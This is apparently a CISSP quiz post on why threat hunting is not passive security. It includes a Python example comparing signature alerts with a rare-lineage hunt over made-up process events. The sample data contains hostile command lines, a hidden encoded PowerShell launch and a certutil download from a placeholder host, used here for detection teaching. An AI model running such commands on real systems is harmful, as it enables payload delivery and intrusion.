Which of the following is not a typical measure or practice implemented in a passive security strategy? (Wentz QOTD)
A. Vulnerability scanning
B. Penetration testing
C. Incident response
D. Threat hunting
Kindly be reminded that the suggested answer is for your reference only. It doesn’t matter whether you have the right or wrong answer. What really matters is your reasoning process and justifications.
My suggested answer is D. Threat hunting.
Wentz’s book, The Effective CISSP: Security and Risk Management, helps CISSP and CISM aspirants build a solid conceptual security model. It is a tutorial for information security and a supplement to the official study guides for the CISSP and CISM exams and an informative reference for security professionals.
Threat hunting, also known as cyberthreat hunting, is a proactive approach to identifying previously unknown, or ongoing non-remediated threats, within an organization’s network. (IBM)
Cyber threat hunting is an active cyber defence activity. It is “the process of proactively and iteratively searching through networks to detect and isolate advanced threats that evade existing security solutions.” This is in contrast to traditional threat management measures, such as firewalls, intrusion detection systems (IDS), malware sandboxes and SIEM systems, which typically involve an investigation of evidence-based data after there has been a warning of a potential threat. (Wikipedia)
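The contrast drawn in the two definitions above (a passive control that acts only after a warning, versus a hunt that goes looking for what the controls missed) in runnable form. This is an added example written for this page, not code from IBM, Wikipedia or Wentz's book; the process-creation records, host names, the single signature rule and the `max_hosts` rarity threshold are all constructed assumptions. The same batch of events is fed to a fixed signature list (the alert-driven, passive side) and to a hypothesis-driven stacking hunt (the proactive side), and the hunt reports only what the signatures did not already catch.

```python
"""Alert-driven (passive) detection versus hypothesis-driven hunting over one
constructed batch of process-creation events."""
from collections import defaultdict

# Constructed sample telemetry (assumption: one record per process start, as an
# EDR or Sysmon process-creation feed would supply). Hosts, command lines and the
# encoded string are made up for this example.
EVENTS = [
    {"id": 1,  "host": "ws01", "parent": "explorer.exe", "child": "chrome.exe",  "cmd": "chrome.exe"},
    {"id": 2,  "host": "ws02", "parent": "explorer.exe", "child": "chrome.exe",  "cmd": "chrome.exe"},
    {"id": 3,  "host": "ws03", "parent": "explorer.exe", "child": "chrome.exe",  "cmd": "chrome.exe"},
    {"id": 4,  "host": "ws01", "parent": "explorer.exe", "child": "outlook.exe", "cmd": "outlook.exe"},
    {"id": 5,  "host": "ws02", "parent": "explorer.exe", "child": "outlook.exe", "cmd": "outlook.exe"},
    {"id": 6,  "host": "ws04", "parent": "services.exe", "child": "svchost.exe", "cmd": "svchost.exe -k netsvcs"},
    {"id": 7,  "host": "ws05", "parent": "services.exe", "child": "svchost.exe", "cmd": "svchost.exe -k netsvcs"},
    {"id": 8,  "host": "ws03", "parent": "winword.exe",  "child": "powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"id": 9,  "host": "ws06", "parent": "svchost.exe",  "child": "certutil.exe",
     "cmd": "certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt"},
    {"id": 10, "host": "ws07", "parent": "explorer.exe", "child": "cmd.exe",     "cmd": "cmd.exe /c whoami"},
    {"id": 11, "host": "ws08", "parent": "explorer.exe", "child": "cmd.exe",     "cmd": "cmd.exe /c hostname"},
]

# Passive control: a fixed signature list, the way an IDS or SIEM rule works.
# Only an event matching a known pattern raises an alert; everything else passes.
SIGNATURES = {
    "encoded-powershell": lambda e: "powershell" in e["child"].lower()
                                    and "-enc" in e["cmd"].lower(),
}


def signature_alerts(events):
    """Return (signature name, event) pairs for events that a known-bad rule matches."""
    return [(name, e) for e in events
            for name, matches in SIGNATURES.items() if matches(e)]


def rare_lineages(events, max_hosts=1):
    """Hunting hypothesis: a parent->child process pair seen on very few hosts
    across the fleet deserves an analyst's attention even though no rule fired.
    Stacks each lineage by the number of distinct hosts it appears on."""
    hosts = defaultdict(set)
    for e in events:
        hosts[(e["parent"], e["child"])].add(e["host"])
    return {pair for pair, seen_on in hosts.items() if len(seen_on) <= max_hosts}


def hunt_leads(events, max_hosts=1):
    """Events in a rare lineage that the existing signatures did NOT alert on:
    the candidates that 'evade existing security solutions'."""
    rare = rare_lineages(events, max_hosts)
    already_alerted = {e["id"] for _, e in signature_alerts(events)}
    return [e for e in events
            if (e["parent"], e["child"]) in rare and e["id"] not in already_alerted]


if __name__ == "__main__":
    for name, e in signature_alerts(EVENTS):
        print(f"ALERT {name}: host={e['host']} {e['parent']} -> {e['child']}")
    for e in hunt_leads(EVENTS):
        print(f"LEAD  rare lineage, no alert: host={e['host']} "
              f"{e['parent']} -> {e['child']} ({e['cmd']})")
```

Run as a script, the signature side raises one alert (the encoded PowerShell launched from Word) and the hunt surfaces one lead the signatures were blind to (certutil downloading a file under svchost, seen on a single host). The lead is a starting point for triage, not a verdict; the iterative part of hunting is that a confirmed lead becomes a new signature, and `max_hosts` is the knob an analyst turns to trade volume against coverage.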
- Threat Hunting: An Active Cyber Defense Strategy for a Hostile Cyber World
- The pyramid of pain in threat hunting
- Threat Hunting Process
- Why threat hunting is important